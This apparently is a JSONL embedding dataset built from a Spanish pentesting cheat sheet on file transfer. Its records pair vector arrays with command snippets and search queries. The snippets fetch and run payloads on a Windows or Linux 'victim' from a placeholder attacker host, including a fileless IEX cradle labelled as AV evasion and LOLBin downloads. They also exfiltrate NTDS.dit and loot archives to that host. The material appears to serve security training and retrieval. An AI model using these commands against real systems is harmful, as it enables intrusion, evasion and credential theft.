-0.00374, 0.04863, -0.01231, -0.02466, 0.00158, -0.01236, -0.00802, 0.02934, 0.03925, 0.03839, -0.0119, 0.03644, -0.04125, 0.0695, -9e-05, -0.06657, -0.00298, -0.06187, -0.04486, 0.04526, -0.00826, 0.00518, 0.0009, -0.03843, -0.08032, 0.00032, 0.09888, -0.02593, -0.05065, -0.01988, -0.04924, -0.0766, -0.01954, -0.01332, -0.00331, -0.0498, -0.00982, 0.02386, -0.06823, -0.02187, 0.03031]} +{"tipo": "pregunta", "herramienta": "Transferencia de ficheros", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Transferencia de ficheros.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Servidores en tu Kali\n```bash\npython3 -m http.server 7788 # HTTP\nimpacket-smbserver -smb2support SERVER $(pwd) # SMB (anΓ³nimo)\nimpacket-smbserver -username u -password p -smb2support SERVER $(pwd) # SMB con auth\npython3 -m pyftpdlib --user=u --password=p -w -p 21 # FTP\nphp -S 0.0.0.0:7788 # PHP\n```", "indexar": "cual es la herramienta con que puedo iniciar un servicio SMB anΓ³nimo en mi Kali?", "v": [0.00343, 0.12668, 0.00567, 0.01872, -0.03481, -0.20306, -0.23719, -0.07935, -0.16653, -0.02105, -0.08595, -0.09735, 0.14876, -0.11691, -0.00879, 0.17685, 0.05918, -0.09625, -0.00638, 0.1015, 0.0337, 0.01266, -0.0224, -0.02109, -0.06192, 0.00276, 0.08955, -0.02475, -0.12027, -0.01589, -0.07308, -0.02992, 0.02681, -0.05756, -0.01211, -0.12319, -0.02053, 0.14319, 0.07988, 0.01065, 0.01565, -0.04584, 0.06893, 0.07584, 0.06709, -0.01524, 0.02801, 0.03461, 0.05773, 0.1454, -0.04189, -0.17521, -0.2017, -0.06811, -0.04686, 0.00041, 0.19345, -0.19666, -0.03557, -0.03917, -0.02357, 0.00445, -0.05928, -0.05376, 0.10865, -0.10244, -0.02648, 0.00072, -0.10135, 0.09095, -0.019, 0.06428, 0.02413, -0.04127, -0.03893, 0.02787, -0.05083, -0.00964, 0.05427, 0.04609, 0.07385, -0.0671, -0.03674, 0.0864, -0.06966, -0.04075, -0.01885, -0.03241, 0.00939, -0.00344, 0.03563, 0.0754, -0.015, 0.08486, 0.03624, 0.00125, 0.03123, 0.01584, -0.05532, 0.05136, 0.16204, 0.04708, -0.07434, 0.11808, 0.03626, -0.06097, -0.07444, -0.01254, 0.0079, -0.0169, 0.02928, 0.04838, 0.03532, 0.01287, -0.03216, -0.00167, -0.06645, -0.12655, 0.00815, -0.06422, -0.00407, -0.02161, -0.05185, -0.12404, 0.01397, -0.0824, -0.02293, 0.00031, 0.05636, -0.00755, 0.04797, 0.03972, -0.09225, -0.03781, 0.01151, 0.0006, 0.01963, -0.10243, 0.02897, 0.0107, 0.00155, 0.01564, -0.01772, -0.04575, 0.01183, 0.0074, -0.08058, -0.10045, 0.01841, -0.06788, 0.01426, -0.03297, 0.02677, 0.12124, -0.02121, 0.02256, -0.01725, -0.05216, -0.03603, 0.03538, -0.0262, -0.00549, 0.11012, -0.0403, 0.014, -0.07007, 0.04104, -0.00412, 0.02181, -0.01719, -0.06528, 0.05743, 0.07308, -0.04855, 0.05327, -0.02509, -0.09672, -0.02784, 0.02028, -0.0262, -0.00797, -0.0286, -0.03939, 0.00058, -0.0094, -0.00438, 0.00973, -0.028, 0.012, -0.04942, 0.0274, -0.0054, 0.01212, -0.07822, 0.02632, 0.01699, 0.04854, -0.04716, -0.03032, -0.02749, -0.02628, 0.03333, -0.0755, -0.00745, -0.01459, 0.00352, 0.04827, 0.00411, -0.00729, 0.0153, -0.00239, 0.01153, 0.0734, -0.01372, -0.01499, -0.0301, 0.0315, -0.03124, 0.02586, 0.02244, -0.00429, -0.00993, 0.05418, 0.01199, -0.03964, -0.0064, 0.00718, -0.00202, 0.00105, -0.0058, -0.02332, 0.00255, -0.01408, -0.00356, 0.02364, -0.05683, 0.06979, -0.06547, -0.02735, -0.00216, 0.01312, 0.04316, -0.01978, -0.02573, -0.04968, -0.01787, -0.02373, -0.07431, -0.11034, -0.08193, 0.05251, 0.02863, 0.03898, -0.04865, 0.02697, 0.00957]} +{"tipo": "pregunta", "herramienta": "Transferencia de ficheros", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Transferencia de ficheros.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Servidores en tu Kali\n```bash\npython3 -m http.server 7788 # HTTP\nimpacket-smbserver -smb2support SERVER $(pwd) # SMB (anΓ³nimo)\nimpacket-smbserver -username u -password p -smb2support SERVER $(pwd) # SMB con auth\npython3 -m pyftpdlib --user=u --password=p -w -p 21 # FTP\nphp -S 0.0.0.0:7788 # PHP\n```", "indexar": "con que comando puedo ejecutar un servidor FTP simple?", "v": [0.00754, 0.06649, -0.17935, -0.16857, -0.03029, -0.06631, 0.13374, -0.00901, -0.00897, 0.05841, -0.10892, 0.12419, 0.07997, -0.06268, 0.03985, 0.05995, 0.17779, -0.11492, 0.09075, -0.11195, 0.01797, 0.02332, 0.06257, -0.10472, -0.0136, 0.06911, 0.06888, 0.0091, -0.103, -0.16988, 0.13891, -0.01422, 0.04911, 0.00254, 0.03999, 0.05539, -0.02515, 0.08819, -0.07489, 0.10555, -0.00125, 0.11004, -0.13383, 0.07915, -0.0071, -0.02112, 0.07063, -0.10877, 0.19897, -0.01888, 0.03957, -0.09818, -0.08084, -0.02341, -0.10155, 0.01715, 0.11679, -0.16902, 0.05309, 0.04779, -0.1378, -0.05784, 0.02954, -0.01512, 0.01293, 0.03122, -0.03239, -0.10165, -0.0526, 0.02184, -0.0989, 0.03373, -0.08762, 0.02304, 0.0559, -0.0149, -0.04637, -0.01914, 0.0922, 0.03411, -0.00646, -0.00896, -0.08822, 0.04212, -0.13064, -0.11827, -0.06385, -0.05759, 0.00981, -0.01192, 0.05305, 0.04122, -0.06204, 0.07476, 0.06285, 0.03656, 0.08846, -0.00121, 0.03308, 0.00238, 0.04251, -0.00051, -0.06677, 0.10756, 0.06926, 0.05149, 0.1119, -0.01442, 0.0179, -0.01047, 0.07133, -0.00676, 0.05193, -0.03959, -0.08886, -0.11778, -0.04283, -0.08222, 0.02101, 0.00266, -0.14146, -0.03597, -0.01696, 0.10545, 0.00622, -0.05946, 0.02737, 0.01488, 0.02388, -0.01488, 0.00507, -0.034, -0.00636, -0.07372, -0.04109, 0.12514, 0.06213, -0.07631, -0.08129, -0.09401, 0.00495, 0.04798, -0.04806, 0.05585, 0.11879, -0.03889, 0.07376, -0.10464, -0.02878, 0.04035, 0.07952, -0.02758, -0.09675, -0.02574, -0.06257, -0.04402, 0.01796, -0.01689, -0.01399, 0.0561, -0.00874, 0.02936, -0.00182, 0.03971, 0.02169, -0.01005, -0.01591, 0.00748, -0.00583, 0.00888, -0.00725, 0.06455, -0.01665, -0.05174, 0.00915, -0.07411, -0.05125, -0.02875, 0.00381, 0.04495, 0.02382, 0.03293, -0.02208, 0.01654, -0.03297, -0.04124, -0.02812, 0.00151, -0.02507, -0.01063, 0.01978, 0.05751, -0.03507, -0.02528, 0.03617, -0.02841, -0.01119, -0.01762, -0.06271, -0.0582, -0.03877, -0.01782, 0.01057, -0.06435, 0.01469, -0.05716, -0.03716, 0.13932, -0.03008, -0.00105, 0.01272, 0.00081, 0.07837, -0.04619, -0.02784, -0.0111, 0.02651, -0.0303, 0.00811, -0.01978, -0.03551, 0.03478, 0.05209, -0.01617, 0.01506, -0.02968, -0.04107, -0.00367, 0.03934, -0.00338, -0.04305, -0.007, -0.02674, -0.0183, 0.03945, -0.02057, -0.01182, -0.0268, -0.00728, -0.0247, -0.00125, 0.03914, -0.04291, -0.05425, -0.01733, -0.07441, -0.06129, -0.00626, -0.05673, -0.02618, -0.02432, -0.0257, 0.00135, -0.02927, -0.05478, -0.00981]} +{"tipo": "pregunta", "herramienta": "Transferencia de ficheros", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Transferencia de ficheros.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Descargar EN la vΓ­ctima Windows\n```powershell\n(New-Object Net.WebClient).DownloadFile('http://TU_IP/f.exe','C:\\Windows\\Temp\\f.exe')\nInvoke-WebRequest http://TU_IP/f.exe -OutFile f.exe # iwr\nIEX (New-Object Net.WebClient).DownloadString('http://TU_IP/x.ps1') # fileless β†’ AV evasion\nbitsadmin /transfer job http://TU_IP/f.exe C:\\Temp\\f.exe\ncertutil.exe -urlcache -split -f \"http://TU_IP/f.exe\" f.exe # LOLBin clΓ‘sico\ntftp -i TU_IP get f.exe # (DISM /online /Enable-Feature /FeatureName:TFTP)\n```\n```cmd\nnet use x: \\\\TU_IP\\SERVER /user:u p & copy x:\\f.exe . # vΓ­a SMB\n```", "indexar": "quΓ© herramienta me sirve para bajar un archivo de una IP en Windows sin que lo detecten?", "v": [-0.05319, 0.00875, -0.14913, -0.17735, -0.0032, -0.17257, -0.10773, -0.05466, -0.03571, -0.06355, 0.0026, -0.09083, -0.08867, -0.08204, 0.01469, 0.07209, 0.06702, -0.07863, 0.06319, -0.05007, 0.00129, 0.1173, -0.06398, -0.02053, -0.08621, 0.08215, -0.02617, 0.07499, -0.23114, -0.01383, -0.14296, -0.02247, -0.01264, -0.00281, -0.15009, -0.04769, 0.0314, 0.08251, -0.08122, 0.09406, 0.05186, 0.08261, -0.07711, 0.08057, -0.01659, -0.0186, 0.04712, -0.04474, 0.07526, 0.0281, -0.12578, -0.13941, -0.0168, -0.01751, -0.06599, -0.11114, 0.07461, -0.07602, 0.11503, -0.08116, -0.12742, 0.13075, -0.1308, -0.03528, 0.01755, -0.0501, -0.02907, -0.00126, -0.05, 0.02688, -0.01728, 0.05803, 0.05461, 0.06848, 0.00895, 0.00533, -0.04034, -0.0737, 0.07134, -0.01827, 0.11319, 0.05285, -0.06768, -0.01655, -0.09094, -0.14621, 0.06517, -0.08916, 0.02762, -0.13479, 0.05102, 0.07014, -0.06332, 0.07252, 0.05302, -0.03521, 0.1034, -0.0377, -0.01225, 0.06079, 0.09767, -0.08573, -0.11669, 0.087, 0.13242, 0.09379, 0.00521, 0.02245, -0.07573, -0.01383, 0.08479, 0.04442, 0.02733, 0.03363, -0.05989, 0.04065, 0.00541, -0.07905, -0.02208, 0.01773, -0.02158, -0.01191, -0.07863, -0.01956, -0.04604, -0.08587, -0.06236, 0.11854, -0.05463, 0.01127, 0.04372, -0.00865, -0.13338, -0.02556, -0.03833, 0.02094, 0.04584, -0.05172, -0.02092, -0.01536, 0.14595, -0.00437, -0.01371, 0.00942, 0.05035, -0.04451, 0.04847, 0.01702, -0.05857, -0.07933, 0.04316, -0.0539, -0.00246, -0.01364, -0.0878, 0.0536, 0.04977, -0.01307, -0.01461, -0.01228, -0.05379, 0.00933, 0.03018, -0.0495, 0.03299, -0.02671, -0.0223, 0.03518, 0.06455, -0.00641, -0.00037, -0.00257, -0.01785, -0.07397, -0.04161, -0.05236, -0.0151, -0.04974, 0.00156, -0.06792, -0.08042, 0.02537, 0.0306, 0.01314, 0.01949, -0.02548, 0.02524, -0.02458, -0.02079, 0.02223, -0.00211, -0.00852, -0.00714, -0.01298, 0.01339, -0.00683, -0.05178, -0.03721, 0.05792, 0.01646, -0.05497, -0.08845, -0.06785, 0.00696, 0.06457, 0.03061, -0.04085, -0.01282, 0.06018, 0.00485, 0.02354, 0.02626, 0.0309, -0.05414, -0.01795, -0.03439, 0.05756, 0.06942, -0.00988, -0.00406, 0.02499, 0.00786, 0.08578, -0.00883, -0.03486, 0.012, -0.03149, 0.02059, 0.00438, -0.03403, 0.02758, 0.03834, -0.03375, -0.00271, 0.02934, -0.07341, -0.00266, -0.02827, -0.04792, -0.08852, -0.04024, 0.06016, -0.00273, -0.06077, -0.03194, -0.03736, -0.00446, 0.02215, 0.00467, -0.07824, -0.0292, -0.02568, 0.08607, -0.02302, 0.00984, 0.00437]} +{"tipo": "pregunta", "herramienta": "Transferencia de ficheros", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Transferencia de ficheros.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Descargar EN la vΓ­ctima Windows\n```powershell\n(New-Object Net.WebClient).DownloadFile('http://TU_IP/f.exe','C:\\Windows\\Temp\\f.exe')\nInvoke-WebRequest http://TU_IP/f.exe -OutFile f.exe # iwr\nIEX (New-Object Net.WebClient).DownloadString('http://TU_IP/x.ps1') # fileless β†’ AV evasion\nbitsadmin /transfer job http://TU_IP/f.exe C:\\Temp\\f.exe\ncertutil.exe -urlcache -split -f \"http://TU_IP/f.exe\" f.exe # LOLBin clΓ‘sico\ntftp -i TU_IP get f.exe # (DISM /online /Enable-Feature /FeatureName:TFTP)\n```\n```cmd\nnet use x: \\\\TU_IP\\SERVER /user:u p & copy x:\\f.exe . # vΓ­a SMB\n```", "indexar": "con quΓ© puedo copiar un ejecutable desde otra computadora a la vΓ­ctima usando comandos bΓ‘sicos?", "v": [0.16686, 0.14571, -0.07392, -0.02871, 0.00184, -0.19034, 0.09911, 0.03118, -0.07251, -0.12149, -0.08076, -0.04009, 0.02596, 0.0504, 0.01454, -0.03286, 0.13811, -0.01523, 0.00591, -0.07978, 0.07644, -0.09528, 0.04278, -0.02629, -0.05633, 0.0785, 0.03891, 0.05242, -0.0924, -0.07874, -0.01488, 0.02906, 0.13281, -0.05262, 0.00562, 0.01703, -0.10408, -0.04664, 0.02046, 0.08593, 0.07576, 0.09968, -0.17695, 0.00043, 0.08536, -0.02694, 0.00573, -0.01875, 0.01209, -0.03346, -0.01235, -0.05303, -0.1882, -0.16178, -0.05366, -0.09563, 0.184, -0.10648, 0.14507, -0.00278, -0.03859, 0.00758, 0.02166, 0.05295, 0.01159, 0.00623, 0.0126, -0.1236, -0.03398, 0.06312, -0.07909, 0.13749, 0.01036, -0.04129, 0.06778, -0.05263, -0.05798, -0.05895, 0.14671, 0.0358, -0.06878, -0.0772, -0.11834, 0.00853, -0.07894, -0.09195, -0.01371, -0.0534, 0.00951, -0.03562, 0.09892, 0.00966, 0.01151, 0.02246, 0.09025, -0.00732, 0.06061, -0.00373, 0.00433, 0.02395, 0.12038, -0.07064, -0.06575, 0.14943, -0.00878, 0.02098, 0.03016, -0.05147, -0.0496, -0.12117, 0.04421, -0.01569, -0.04925, -0.0587, -0.1194, -0.06987, -0.0079, -0.03894, 0.00473, -0.00099, -0.06111, 0.06472, 0.0141, 0.03041, -0.0029, -0.02955, 0.01285, 0.05711, -0.04335, -0.07655, 0.00907, -0.02816, 0.05661, -0.04425, -0.02389, 0.09184, 0.0068, -0.09903, -0.04602, -0.1369, 0.09344, 0.09727, -0.04277, -0.01792, 0.006, 0.03746, 0.08539, -0.0818, -0.09078, 0.00759, 0.09048, 0.01317, -0.07006, 0.02583, -0.05635, -0.01656, -0.01026, -0.00523, -0.04093, 0.0676, -0.05648, 0.03349, -0.00927, 0.00016, -0.00276, -0.04571, -0.03908, -0.02113, 0.0859, 0.0653, -0.01918, 0.02402, -0.0271, -0.04484, 0.02192, -0.10171, -0.01294, 0.00302, -0.0297, -0.00578, -0.03079, 0.09434, -0.05262, 0.01851, -0.03065, -0.02795, -0.03183, 0.02079, -0.03338, 0.03261, -0.00353, 0.06623, -0.00888, -0.00711, 0.02759, -0.03462, -0.02808, 0.02585, -0.03056, -0.00833, -0.09834, 0.03631, -0.05414, -0.06314, 0.09967, 0.06341, -0.05404, 0.01073, -0.03501, 0.06392, -0.02254, -0.00396, 0.02807, -0.02668, -0.02822, -0.04105, 0.03788, -0.00341, 0.02652, -0.00605, 0.02757, -0.01034, 0.06831, -0.0251, 0.03948, 0.00713, -0.01591, 0.02954, 0.00664, -0.02222, -0.02936, 0.03764, 0.00672, -0.04652, 0.0217, 0.00762, -0.01921, 0.01711, -0.06559, 0.00838, -0.00337, 0.05768, -0.04603, -0.09739, 0.00256, -0.00395, -0.05728, 0.01814, -0.02171, -0.06056, -0.00508, 0.0174, 0.01634, -0.08826, -0.05706, -0.02126]} +{"tipo": "pregunta", "herramienta": "Transferencia de ficheros", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Transferencia de ficheros.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Descargar EN la vΓ­ctima Linux\n```bash\nwget http://TU_IP/f -O f ; curl -o f http://TU_IP/f\nphp -r '$f=file_get_contents(\"http://TU_IP/f\");file_put_contents(\"f\",$f);'\npython3 -c \"import urllib.request;urllib.request.urlretrieve('http://TU_IP/f','f')\"\ncat < /dev/tcp/TU_IP/7788 > f # con nc -lvnp 7788 < f en Kali\n```", "indexar": "que programa sirve para descargar contenido de una web usando comandos en Linux?", "v": [-0.0161, 0.08974, -0.11645, -0.22986, 0.02379, -0.17711, -0.10387, -0.00233, -0.06231, -0.0479, -0.05102, -0.12136, -0.01364, -0.11568, -0.05621, -0.02338, 0.08437, -0.12915, 0.02349, -0.06015, 0.02659, 0.0548, -0.11666, -0.07752, 0.03339, 0.03467, 0.09295, -0.10462, -0.01024, -0.00179, -0.05486, 0.01904, 0.05092, 0.02336, -0.10045, 0.0659, -0.00457, -0.00925, 0.0466, 0.15604, 0.08557, -0.00928, -0.10712, 0.06034, -0.08188, -0.13991, 0.1159, -0.07779, 0.08294, -0.13959, 0.08764, -0.03396, -0.05405, -0.00482, -0.01329, -0.075, 0.13451, -0.2028, 0.00372, 0.03318, -0.08885, -0.03704, 0.04782, 0.01691, 0.00918, -0.01774, -0.01529, 0.00448, -0.10399, 0.026, -0.02487, 0.12577, 0.00559, -0.00883, 0.05135, 0.029, -0.0997, -0.0013, 0.0721, -0.0265, 0.03872, -0.01949, 0.02346, 0.11329, -0.13042, -0.17237, -0.00966, -0.01518, -0.0166, -0.01875, 0.06998, 0.09195, 0.02788, 0.06788, 0.08451, -0.03269, 0.11769, 0.07783, 0.10011, 0.01899, -0.02054, -0.00335, -0.09167, 0.10576, 0.01843, 0.07213, 0.08367, -0.08232, -0.00884, 0.02427, 0.02473, -0.07897, 0.01564, -0.04639, -0.0904, -0.02882, -0.00617, -0.02761, -0.0045, -0.0734, -0.12332, 0.0652, -0.03822, 0.07175, 0.01542, -0.00512, -0.03549, 0.12067, -0.04555, -0.03272, 0.04205, -0.10991, 0.00759, 0.02584, -0.06369, 0.00319, 0.05524, -0.05596, -0.07074, -0.07312, 0.03887, 0.0432, -0.01819, 0.08827, 0.09147, -0.01427, 0.0447, -0.06959, -0.03007, -0.04783, 0.00929, 0.01763, -0.03496, -0.0233, -0.09674, -0.06157, -0.00231, -0.03011, -0.09599, -0.00686, -0.05337, -0.03341, 0.01336, 0.00457, -0.01649, -0.02198, -0.04524, 0.06731, 0.04051, 0.08513, 0.00533, 0.09396, 0.02548, -0.10979, 0.00486, -0.06624, 0.01258, -0.04915, -0.01089, 0.01492, -0.05724, 0.04059, 0.03458, 0.01657, -0.03529, -0.01299, -0.07085, 0.0567, -0.02649, -0.02051, -0.01579, 0.06204, -0.03641, -0.01856, 0.01199, 0.02905, -0.04855, -0.01232, -0.0129, -0.03083, -0.11817, 0.01804, 0.00562, -0.03577, 0.04673, 0.03488, -0.01168, 0.01129, 0.01332, 0.03517, -0.01221, 0.0228, 0.04259, -2e-05, 0.00339, -0.03595, 0.05155, 0.07498, 0.01671, -0.00537, -0.02355, -0.01303, 0.05409, 0.00768, 0.02578, -0.05537, 0.01337, -0.00909, 0.03499, 0.01148, 0.01617, -0.01638, -0.00856, -0.0262, 0.0211, -0.02071, -0.02215, 0.05874, -0.015, -0.06646, -0.07029, 0.06947, 0.00705, -0.09164, -0.03071, -0.05953, -0.07542, -0.02237, -0.00391, -0.01785, -0.05478, 0.02088, 0.00193, -0.03335, -0.05165, 0.04091]} +{"tipo": "pregunta", "herramienta": "Transferencia de ficheros", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Transferencia de ficheros.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Descargar EN la vΓ­ctima Linux\n```bash\nwget http://TU_IP/f -O f ; curl -o f http://TU_IP/f\nphp -r '$f=file_get_contents(\"http://TU_IP/f\");file_put_contents(\"f\",$f);'\npython3 -c \"import urllib.request;urllib.request.urlretrieve('http://TU_IP/f','f')\"\ncat < /dev/tcp/TU_IP/7788 > f # con nc -lvnp 7788 < f en Kali\n```", "indexar": "con que herramienta puedo obtener el contenido de un archivo HTTP desde otra IP?", "v": [-0.04319, 0.00018, -0.0848, -0.13978, 0.05491, -0.16592, -0.02141, -0.03017, -0.05143, 0.03638, -0.09885, -0.02264, 0.01202, -0.03269, 0.02654, 0.09545, 0.13513, -0.09658, 0.0775, -0.10549, 0.01759, 0.1062, -0.12639, -0.02406, -0.09393, -0.05552, -0.02557, 0.18184, -0.17588, -0.10328, -0.02727, -0.04107, -0.04707, 0.1196, -0.14962, -0.04896, 0.01208, 0.16963, -0.08567, 0.03489, 0.02727, 0.06682, -0.06242, 0.03128, -0.08029, 0.02957, -0.01384, -0.03127, 0.04543, -0.09858, -0.01403, -0.17144, -0.14932, -0.01192, -0.13062, 0.01873, 0.13772, -0.17892, 0.01446, -0.08679, -0.06008, 0.04727, -0.07927, -0.02334, -0.01889, -0.06103, -0.05076, 0.03989, -0.16111, 0.07028, -0.04107, 0.07432, 0.01106, 0.01179, 0.07279, 0.01033, -0.06548, -0.05567, -0.06077, 0.0389, 0.05324, 0.00898, -0.02465, 0.01691, -0.13043, -0.10972, 0.01731, -0.12633, 0.08733, -0.11669, 0.07481, 0.11055, -0.0563, 0.01074, -0.03581, -0.06285, 0.06402, -0.04311, 0.01268, -0.04563, 0.02456, 0.06032, -0.08534, 0.07355, 0.15089, 0.10275, 0.04432, 0.0222, -0.01292, -0.03877, 0.01366, 0.05273, 0.03306, 0.02987, -0.02611, 0.04183, -0.03407, -0.03088, 0.04556, -0.08029, -0.00697, -0.02625, -0.09688, 0.02652, -0.00835, -0.00088, -0.03376, 0.09448, -0.02143, -0.06323, 0.01935, -0.02193, -0.06917, 0.00593, -0.00387, -0.00046, 0.05137, -0.10024, -0.02295, 0.00286, 0.03746, -0.05053, -0.02632, -0.0049, 0.10102, -0.05922, -0.02362, -0.07872, -0.06032, -0.06425, 0.00809, -0.03372, -0.03352, -0.00889, -0.08818, 0.07274, -0.01132, -0.08393, -0.05952, 0.03408, -0.03219, -0.01628, 0.04975, 0.0258, 0.01177, 0.02748, -0.09927, 0.00923, 0.07112, -0.02651, 0.01275, 0.01905, -0.0207, -0.11714, -0.06374, -0.06914, -0.07746, -0.02236, 0.01681, -0.06967, -0.03428, -0.02919, -0.01427, 0.01536, 0.00522, -0.05227, 0.05586, -0.01843, -0.00766, 0.01439, 0.00631, 0.01827, -0.04836, 0.05161, 0.05209, -0.0019, -0.06869, -0.02644, 0.03314, 0.00272, -0.05232, -0.05246, 0.02449, -0.02933, -0.00279, 0.01454, -0.02004, -0.02714, -0.039, -0.02796, 0.02827, -0.01631, 0.06784, -0.07111, -0.01715, 0.02393, 0.04458, 0.06094, -0.03332, 0.00617, 0.0048, 0.02195, 0.04548, -0.02038, 0.02883, -0.01268, 0.01959, 0.00444, 0.0092, -0.03187, -0.02595, 0.03928, -0.04923, -0.01335, 0.09308, -0.03113, 0.00545, -0.01393, -0.04771, -0.04094, -0.00874, 0.02385, -0.00932, -0.02795, 0.00964, -0.04311, -0.06051, 0.01014, -0.00767, -0.07331, -0.06008, -0.03139, 0.05624, -0.03946, -0.0158, -0.00841]} +{"tipo": "pregunta", "herramienta": "Transferencia de ficheros", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Transferencia de ficheros.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Descargar EN la vΓ­ctima Linux\n```bash\nwget http://TU_IP/f -O f ; curl -o f http://TU_IP/f\nphp -r '$f=file_get_contents(\"http://TU_IP/f\");file_put_contents(\"f\",$f);'\npython3 -c \"import urllib.request;urllib.request.urlretrieve('http://TU_IP/f','f')\"\ncat < /dev/tcp/TU_IP/7788 > f # con nc -lvnp 7788 < f en Kali\n```", "indexar": "cual es un mΓ©todo sencillo para extraer datos a un archivo local mediante wget o curl", "v": [0.03842, 0.08918, -0.07238, -0.11342, -0.0609, -0.12346, 0.06019, 0.0208, -0.08164, -0.11509, -0.20702, -0.09625, 0.00671, -0.03091, 0.05753, -0.1129, 0.14914, -0.13667, 0.06111, -0.06738, -0.09083, -0.02287, -0.06187, -0.08204, -0.11778, 0.01456, 0.04208, 0.08996, -0.15071, 0.02912, -0.00541, 0.06496, -0.01562, -0.01308, -0.09215, 0.02549, 0.05564, 0.0865, -0.19228, -0.03633, -0.05304, -0.07434, -0.12305, 0.17356, -0.06828, -0.03881, 0.01271, 0.08598, 0.00238, 0.0259, 0.06794, 0.03192, -0.07786, 0.00742, -0.04965, -0.04154, 0.01566, -0.16679, -0.00422, 0.0367, -0.02615, -0.03043, -0.03577, 0.04281, 0.0074, -0.03062, 0.04547, 0.06148, -0.14465, 0.00787, 0.03363, 0.05566, 0.10807, -0.0176, -0.02713, -0.00867, 0.02051, -0.05106, 0.01514, -0.06035, -0.0926, -0.04739, 0.04839, -0.02024, -0.14041, -0.02881, 0.13232, -0.10073, 0.00224, -0.11026, 0.09681, -0.03962, 0.01316, 0.01841, 0.02694, -0.03293, -0.00543, 0.04282, -0.02489, -0.01736, 0.0157, -0.01154, -0.1039, 0.16198, 0.11944, 0.0224, 0.01756, 0.07163, -0.0867, -0.06916, -0.04488, 0.02035, 0.00783, 0.07632, -0.07318, -0.06209, -0.02243, -0.01475, -0.05633, -0.01859, -0.00311, -0.10074, 0.00287, -0.00442, -0.05854, -0.09068, -0.04208, 0.07831, -0.02013, 0.02824, -0.02012, 0.01687, -0.02628, 0.00621, 0.10391, 0.05566, 0.08329, -0.07845, 0.00383, -0.04351, 0.04532, -0.02078, -0.05582, 0.00206, 0.11196, -0.04908, 0.01289, 0.00346, -0.05123, -0.0341, 0.00493, -0.01597, -0.02967, 0.00014, -0.14104, -0.02933, 0.09105, -0.13875, -0.05097, 0.01791, -0.03537, 0.06104, 0.01215, 0.0056, -0.01727, -0.12673, -0.02709, 0.00354, 0.03192, -0.06602, -0.02059, 0.05216, -0.00741, -0.0764, 0.05022, 0.02499, -0.00947, -0.1404, 0.02814, -0.01349, -0.00744, 0.04048, 0.00711, 0.01904, -0.02728, -0.07961, 0.07716, -0.00258, -0.03925, 0.0444, -0.02948, 0.0156, -0.00142, 0.02292, -0.03806, -0.00102, -0.0176, -0.01106, 0.02979, 0.01964, -0.07333, -0.00484, 0.00763, -0.01414, -0.02868, 0.0626, -0.02477, -0.05322, -0.02675, -0.03597, 0.04846, -0.03627, 0.05541, -0.01316, -0.02178, -0.00521, 0.00607, -0.05447, -0.02447, 0.0293, -0.0231, 0.01673, 0.09032, 0.01453, -0.06607, 0.02501, 0.05396, 0.06101, -0.04686, -0.00886, -0.02888, 0.05171, 0.00621, 0.0133, 0.04916, 0.00571, 0.01128, -0.01127, -0.03231, -0.08346, 0.06015, 0.03627, -0.04723, -0.03043, -0.04682, -0.02042, -0.10707, 0.05265, 0.01303, -0.08582, 0.02158, -0.05254, 0.01989, 0.01768, 0.0297, -0.07362]} +{"tipo": "pregunta", "herramienta": "Transferencia de ficheros", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Transferencia de ficheros.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Exfiltrar de la vΓ­ctima β†’ Kali\n```cmd\ncopy C:\\Windows\\NTDS\\ntds.dit \\\\TU_IP\\SERVER\\ :: SMB (cifra, cruza firewalls) β†’ secretsdump\n(New-Object Net.WebClient).UploadFile('http://TU_IP/up.php','loot.zip')\n```\n```bash\nscp loot.tar user@TU_IP:/tmp/ # si hay SSH\n```", "indexar": "que programa de Kali Linux sirve para extraer contraseΓ±as del Windows?", "v": [0.02606, -0.00364, -0.06029, -0.18438, -0.01519, -0.20909, -0.10815, -0.03692, -0.04014, -0.05679, 0.02573, -0.11304, -0.03424, -0.1649, -0.00456, -0.01902, 0.01488, -0.13207, 0.07446, 0.01099, -0.06933, 0.06775, -0.12142, -0.02699, 0.02973, 0.04274, 0.03076, -0.10434, -0.0133, 0.03113, -0.08159, 0.02141, -0.00599, -0.02452, -0.00531, 0.1501, -0.01202, 0.09836, 0.10575, 0.11376, 0.16287, 0.07118, -0.01623, 0.09064, -0.04976, -0.11417, 0.13772, -0.02637, 0.17335, -0.08565, 0.01594, -0.01584, -0.01683, -0.03707, 0.08842, -0.09992, 0.08616, -0.10188, -0.02721, 0.03249, -0.11851, 0.04579, -0.01862, -0.00718, -0.01526, -0.02698, 0.05057, 0.01862, -0.11313, 0.09881, -0.05185, 0.07989, 0.03824, -0.00846, -0.02227, 0.01453, -0.08461, -0.01379, 0.05924, 0.0126, 0.00081, 0.01613, 0.07389, -0.00114, -0.11482, -0.12573, 0.0362, -0.02119, -0.00914, -0.01621, 0.1149, 0.01815, -0.00686, 0.14463, 0.12394, -0.05124, 0.10855, 0.07815, -0.01321, 0.07268, -0.03814, -0.04867, -0.06346, 0.15365, -0.04732, 0.07416, 0.06548, -0.04446, -0.01661, -0.04975, 0.04146, 0.00289, -0.01372, -0.0584, -0.09081, -0.02583, -0.04246, -0.04857, 0.01872, 0.00802, -0.07256, -0.02733, -0.03231, 0.02789, 0.0047, -0.02344, -0.0595, 0.12264, -0.08365, -0.06183, 0.07295, -0.04699, -0.03098, 0.06577, -0.06611, 0.03436, 0.05654, -0.11679, -0.04019, -0.02678, 0.06243, 0.04142, 0.06157, 0.05635, 0.07305, 0.03912, 0.06505, 0.02049, -0.00405, -0.06648, 0.01136, -0.0165, 0.03183, 0.01434, -0.11093, -0.02584, -0.00597, 0.03342, -0.07281, 0.05402, -0.02848, -0.05869, -0.00781, -0.0245, -0.02688, 